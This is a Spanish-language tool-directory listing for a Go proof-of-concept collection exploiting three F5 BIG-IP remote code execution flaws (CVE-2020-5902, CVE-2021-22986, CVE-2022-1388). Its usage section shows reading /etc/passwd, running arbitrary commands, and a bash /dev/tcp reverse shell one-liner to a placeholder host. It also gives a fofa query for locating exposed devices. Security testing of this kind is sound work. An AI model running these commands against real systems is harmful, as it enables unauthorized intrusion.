Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
F5-BIG-IP-POC — CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 Colección de POCs | Kitploit
Herramientas/GitHubGitHub/west9b/f5-big-ip-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlHerramienta de Acceso Remoto
GitHubwest9b/f5-big-ip-poc

F5-BIG-IP-POC

CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 Colección de POCs

Ver Repositorio
102hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

F5-BIG-IP POC

Colección de POC escrita en Go para CVE-2020-5902, CVE-2021-22986, CVE-2022-1388. Se añadirán otros POC de F5 en el futuro.

author:160team.west9B

Solo para uso por parte de investigadores de seguridad bajo autorización. Cumpla con la ley de ciberseguridad. Cualquier problema o consecuencia es responsabilidad del usuario, no del autor.

01-Introducción básica

Colección de POC de F5:

CVE-2020-5902: Vulnerabilidad de ejecución remota de código en F5 BIG-IP

CVE-2021-22986: Vulnerabilidad de ejecución remota de comandos no autorizada en iControl REST de F5 BIG-IP

CVE-2022-1388: Ejecución remota de comandos mediante evasión de autenticación

02-Instrucciones de uso

usage: ./F5-BIG-IP -u url

CVE-2020-5902 verifica mediante descarga de archivos arbitrarios. Si devuelve /etc/passwd, la vulnerabilidad existe.

Los POC de CVE-2021-22986 y CVE-2022-1388 ejecutan el comando id por defecto. Si devuelve {id}, la vulnerabilidad existe. Se puede usar -c para comandos personalizados.

Reverse shell

usage: ./cve-2022-30525.exe -m exp -u url -c bash -i >& /dev/tcp/xxxx/1377 0>&1

Capturas de pantalla

Image text Image text

fofa

icon_hash="-335242539"

Descargar herramienta